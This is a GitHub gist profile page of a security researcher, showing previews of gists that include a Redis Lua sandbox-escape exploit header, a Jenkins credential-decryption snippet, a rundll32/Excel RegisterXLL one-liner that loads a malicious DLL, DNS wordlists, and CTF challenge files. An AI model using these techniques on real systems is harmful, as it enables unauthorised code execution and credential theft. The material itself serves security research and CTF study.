Skip to content

Instantly share code, notes, and snippets.

🍊
This is orange ._.

Orange Tsai orangetw

View GitHub Profile
@orangetw
orangetw / redis-lua-linux-x86-poc.py
Created Feb 12, 2019 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
View redis-lua-linux-x86-poc.py
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
View introspection-query.graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
@orangetw
orangetw / all.txt
Created Sep 7, 2018 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@orangetw
orangetw / Advanced-HTTP-en.md
Created Nov 19, 2017 — forked from nicolas-grekas/Advanced-HTTP-en.md
Advanced handling of HTTP requests in PHP
View Advanced-HTTP-en.md
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
#go to the jenkins url
http://jenkins-host/script
#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'
@orangetw
orangetw / excel.bat
Created Jul 22, 2017 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
View bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00 https://hackerone.com/reports/18851
CVE-2015-3842 Android 2,000.00 https://code.google.com/p/android/issues/detail?id=177610
CVE-2015-3847 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=179147
CVE-2015-3860 Android 500.00 https://code.google.com/p/android/issues/detail?id=178139
CVE-2015-3862 Android 333.00 https://code.google.com/p/android/issues/detail?id=181895
CVE-2015-3865 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=182294
CVE-2015-3867 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182838
CVE-2015-3868 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182146
CVE-2015-3869 Android 3,000.00 https://code.google.com/p/android/issues/detail?id=182053
View ruby_revealer.sh
#!/usr/bin/sudo sh
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!
@orangetw
orangetw / nanana.xxd
Created Oct 19, 2015
HITCON CTF 2015 Quals nanana
View nanana.xxd
0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
0000010: 0200 3e00 0100 0000 2008 4000 0000 0000 ..>..... .@.....
0000020: 4000 0000 0000 0000 c811 0000 0000 0000 @...............
0000030: 0000 0000 4000 3800 0900 4000 1c00 1b00 ....@.8...@.....
0000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@.......
0000050: 4000 4000 0000 0000 4000 4000 0000 0000 @.@.....@.@.....
0000060: f801 0000 0000 0000 f801 0000 0000 0000 ................
0000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
0000080: 3802 0000 0000 0000 3802 4000 0000 0000 8.......8.@.....
0000090: 3802 4000 0000 0000 1c00 0000 0000 0000 8.@.............
@orangetw
orangetw / index.php
Created Oct 19, 2015
HITCON CTF 2015 Quals Giraffe's Coffee
View index.php
<?php
include "config.php";
mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($dbname);
function escape($str){
$str = strtolower($str);
$str = str_replace("'", "", $str);
$str = str_replace("\\", "", $str);
You can’t perform that action at this time.